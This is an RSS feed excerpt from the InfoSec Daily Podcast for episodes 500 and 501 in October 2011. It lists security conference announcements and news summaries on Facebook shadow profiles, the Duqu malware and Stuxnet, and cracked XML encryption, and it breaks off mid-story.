		<itunes:subtitle>InfoSec Daily Podcast Episode 501 for October 22, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. Bonez, Boris Sverdlik (Live from Hack3rCon), and Geordy Rostad.
	Announcements:
	Hack3rCon 2011
	When: October 21-23rd, 2011
	Where: the Charleston [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 501 for October 22, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. Bonez, Boris Sverdlik (Live from Hack3rCon), and Geordy Rostad.
	Announcements:
	Hack3rCon 2011
	When: October 21-23rd, 2011
	Where: the Charleston House Hotel and Conference Center
	http://www.hack3rcon.org/
	NordSec 2011
	When: October 26&#8211;28, 2011
	Where: Tallinn Science Park &#8220;Tehnopol&#8221;, Tallinn, Estonia
	http://nordsec2011.cyber.ee/
	New Hampshire InfoSec Tweetup
	When: October 29, 2011
	Where: Pawtuckaway State Park in Nottingham, NH
	http://nhinfosectweetup.eventbrite.com/ 
	( It is just a gathering of security professionals and their families. &#160;No talks, just abunch of likeminded people and some good food.)
	BsidesATL 2011
	When: November 4th, 2011
	Where: Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).
	http://www.securitybsides.com/w/page/44893559/BSidesATL-2011
	This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &#160;Of course all day Podcast Area.

	SkyDogCon
	When: Nov 4th &#8211; Nov 6th
	Where: Holiday Inn Airport, Nashville, TN
	http://www.skydogcon.com
	Phreaknic
	When: Nov 4th &#8211; Nov 6th
	Where: Days Inn Stadium, Nashville, TN
	http://www.phreaknic.info

	BSidesDFW 2011
	When: November 5th, 2011
	Where: Microsoft Technology Center Dallas
	http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011
	Cost = FREE
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://securology.blogspot.com/2009/01/so-you-think-you-want-job-in-computer.html
	This story is from 2009 but we want to talk about it again to see how relevant it still is today or if it&#8217;s just a bunch of FUD.
	Source: http://www.h-online.com/open/news/item/Rapid7-announces-Community-Edition-of-Metasploit-1363434.html
	Rapid 7 offers up a community edition of Metasploit pro? &#160;Cool and confusing all at once.
	Source: http://www.felipemartins.info/2011/08/security-and-hacking-complete-movie-list/
	This is the biggest list of movies hackers might enjoy that we&#8217;ve ever seen and we&#8217;ll talk about a few of our favorites.
	Source: http://it.slashdot.org/story/11/10/21/2026242/most-sophisticated-rootkit-getting-an-overhaul
	The badguys are upgrading the code on TDL4 pushing towards a proper turnkey release.
	Source: https://www.scmagazineus.com/duqu-underscores-trouble-av-industry-has-in-stopping-threats/article/214938/
	Another nail in the coffin of signature-based antivirus. &#160;Duqu wasn&#8217;t detected for months and clearly exposes the problem in using A/V as your one and only defense.
	Source: http://techcrunch.com/2011/10/21/video-unlock-any-ipad-2-with-just-a-smart-cover-and-5-seconds/
	More stupid Apple(security) tricks. &#160;This video shows you how to unlock an iPad 2 with the smart cover or any magnet.
	Source: http://www.theregister.co.uk/2011/10/21/skype_bittorrent_stalking/
	Ceiling cat can see your torrents via Skype even when you aren&#8217;t logged in!
	Source: http://bit.ly/r5bBVe
	Tell me Google, what&#8217;s my IP address? &#160;You know everything else so surely this will be easy for you&#8230;
	Source: http://www.feross.org/webcam-spy/
	The reverse porno attack.
	Source: http://www.msnbc.msn.com/id/44979692
	Anonymous finally takes on a cause that most of us can stand behind[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 500 &#8211;  Shadow Profiles, Son of Stuxnet, Cryptoboffins, &amp; LIVE from Hack3rCon</title>
		<link>http://www.isdpodcast.com/episode-500-shadow-profiles-son-of-stuxnet-cryptoboffins-live-from-hack3rcon</link>
		<comments>http://www.isdpodcast.com/episode-500-shadow-profiles-son-of-stuxnet-cryptoboffins-live-from-hack3rcon#comments</comments>
		<pubDate>Sat, 22 Oct 2011 01:14:02 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=2994</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 500 for October 20, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Dave Kennedy, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Keith Pachulski, Dr. Bonez and Varun Sharma. Announcements: Hack3rCon 2011 When: October 21-23rd, 2011 Where: the Charleston House Hotel and Conference Center http://www.hack3rcon.org/ NordSec 2011 When: October 26&#8211;28, 2011 [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 500 for October 20, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Dave Kennedy, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Keith Pachulski, Dr. Bonez and Varun Sharma.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hack3rCon 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 21-23rd, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: the Charleston House Hotel and Conference Center</span><br />
	<a href="http://www.hack3rcon.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.hack3rcon.org/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NordSec 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 26&ndash;28, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Tallinn Science Park &ldquo;Tehnopol&rdquo;, Tallinn, Estonia</span><br />
	<a href="http://nordsec2011.cyber.ee/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nordsec2011.cyber.ee/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New Hampshire InfoSec Tweetup</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 29, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Pawtuckaway State Park in Nottingham, NH</span><br />
	<a href="http://nhinfosectweetup.eventbrite.com/%20"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nhinfosectweetup.eventbrite.com/ </span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">( It is just a gathering of security professionals and their families. &nbsp;No talks, just abunch of likeminded people and some good food.)</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BsidesATL 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 4th, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).</span></a><br />
	<a href="http://www.securitybsides.com/w/page/44893559/BSidesATL-2011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/44893559/BSidesATL-2011</span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &nbsp;Of course all day Podcast Area.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SkyDogCon</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Holiday Inn Airport, Nashville, TN</span><br />
	<a href="http://www.skydogcon.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Phreaknic</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Days Inn Stadium, Nashville, TN</span><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.phreaknic.info</span></a></p>
<p>
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSidesDFW 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 5th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Microsoft Technology Center Dallas</span></a><br />
	<a href="http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011<br class="kix-line-break" /><br />
	</span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br class="kix-line-break" /><br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.foxnews.com/scitech/2011/10/21/facebook-building-shadow-profiles-non-members-experts-allege/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.foxnews.com/scitech/2011/10/21/facebook-building-shadow-profiles-non-members-experts-allege/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Eight hundred million users are not enough. Facebook, the world&#39;s biggest social network, is now building profiles of non-users who haven&#39;t even signed up, an international privacy watchdog charges.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The sensational claim is made in</span><a href="http://europe-v-facebook.org/Compalint_02_Shadow_Profiles.pdf"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">a complaint filed in August</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> by Ireland&rsquo;s Data Protection Commissioner. It alleges that users are encouraged to hand over the personal data of other people &#8212; including names, phone numbers, email addresses and more &#8212; which Facebook is using to create &quot;extensive profiles&quot; of non-users.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Facebook categorically denies the allegation, but experts tell FoxNews.com that it could well be true.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;There can be little doubt that Facebook collects from its current users information about individuals who are not currently Facebook users, and collects from its current users information about other Facebook users,&rdquo; said Kelly Kubasta, who heads the Dallas law firm Klemchuk Kubasta&rsquo;s social media division.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ciara O&#39;Sullivan, a spokeswoman for Ireland&#39;s Office of the Data Protection Commissioner, told FoxNews.com that its audit of Facebook Ireland&#39;s privacy policies was part of a &quot;statutory investigation&quot; that the office anticipates will lead to immediate changes.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The Office of the Data Protection Commissioner will be commencing a comprehensive audit of Facebook Ireland before the end of the month,&quot; O&rsquo;Sullivan said.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But Facebook denies that it is creating &quot;shadow profiles&quot; and tracking users and non-users alike.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Facebook does not track users across the web,&rdquo; a Facebook spokesman said in a statement to FoxNews.com. &ldquo;We use cookies on social plug-ins to personalize content, to help maintain and improve what we do, or for safety and security.&rdquo;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Furthermore, Facebook says that no information it receives from users is employed to target ads, and that it does not resell information from users to third parties. The company prominently posts its established privacy policy on its Web site.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But that isn&rsquo;t what they&rsquo;re thinking in Ireland. The complaint makes clear that it believes Facebook is doing just that &#8212; and enumerates several scenarios that would give any social-networker shivers.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Facebook Ireland is gathering excessive amounts of information about data subjects without notice or consent by the data subject,&quot; the complaint states, adding that in many cases the information &quot;might be embarrassing or intimidating for the data subject. This information might also constitute sensitive data such as political opinions, religious or philosophical beliefs, sexual orientation and so forth.&quot;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">European law carries heavy penalties for companies that violate &quot;information privacy&quot; laws &#8212; in contrast to the relatively lax U.S. laws. But the U.S. has issues with Facebook as well: Privacy rights litigation is proceeding in Mississippi, Louisiana, Kansas and Kentucky. The U.S. Federal Trade Commission is also probing complaints about Palo Alto-based Facebook, while Congress is calling for an inquiry.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kubasta noted that &#8212; for better or for worse &#8212; Facebook&#39;s best defense may be a good offense. After all, it&#39;s not alone: Several other websites are undertaking this kind of tracking as well.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Regardless of what Facebook is doing, many websites collect and propagate personally identifiable information about individuals who have not entered into any agreement with the website. Just a few examples include Spokeo, iSearch, WhitePages.com,&rdquo; Kubasta told FoxNews.com.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;In other words, &lsquo;the horse may be out of the barn,&rsquo;&rdquo; he said.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Other experts say these lawsuits may be at the forefront of a new trend &#8212; increased consumer demand for data privacy online, and improved corporate response to those demands.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Marilyn Prosch, co-founder of the Privacy by Design Research Lab at Arizona State University, has conducted extensive research on online privacy, electronic commerce and other IT subjects.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">She is working with social media and other online industry leaders to create guidelines for businesses worldwide to effectively protect personal data.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Privacy assurance must ideally become an organization&rsquo;s default mode of operation,&rdquo; Prosch told FoxNews.com.</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.dw-world.de/dw/article/0,,15478105,00.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.dw-world.de/dw/article/0,,15478105,00.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Internet security firms have raised the specter of a new round of cyber warfare with last week&#39;s detection of the Duqu virus &#8211; a &quot;relative&quot; of last year&#39;s Stuxnet malware, which is thought to have slowed down at least one Iranian nuclear facility.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Duqu&#39;s detection comes amid growing talk in Europe about launching pre-emptive strikes to stop cyberattacks before they happen. But the nature of malware like Duqu and Stuxnet make pre-emptive strikes unrealistic.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The problem is you can&#39;t really say where they come from,&quot; Candid W&uuml;est, a virus expert at IT security firm Symantec told Deutsche Welle.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;You need evidence about who is behind an attack before you can strike pre-emptively,&quot; said W&uuml;est, &quot;but you can never be sure &#8211; you can&#39;t attack infrastructure, or even send in a stealth bomber, because any information about a location could be a red herring.&quot;</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Malware makers can hide their tracks using spoofing, VPNs, proxy services and other means to make it look like they are based in any number of countries &#8211; when in truth they are somewhere completely different.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">W&uuml;est is one of the experts at Symantec, who is currently analyzing the source code behind Duqu. Symantec says it was alerted to the new threat on October 14 by a laboratory that has &quot;international connections.&quot;</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since then, Symantec&#39;s investigations suggest that a &quot;few hundred systems have been infected at a handful of companies,&quot; many of which are in Europe.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Another IT security firm, McAfee, is also working on the virus. McAfee and Symantec both believe that Duqu shares strong similarities with the Stuxnet virus.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Some of its source code matches that of Stuxnet and because the Stuxnet code is not known to be available online, they say it is likely that Duqu was created by the same people or that they sold the code to another group. While it remains unclear where Stuxnet came from, the New York Times reported in January 2011 that Stuxnet was developed by the American and Israeli governments.</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.theregister.co.uk/2011/10/21/xml_crypto_cracked/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/10/21/xml_crypto_cracked/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">German computer scientists have cracked components of an encryption system used to securely exchange data between e-commerce and banking systems.</span><br />
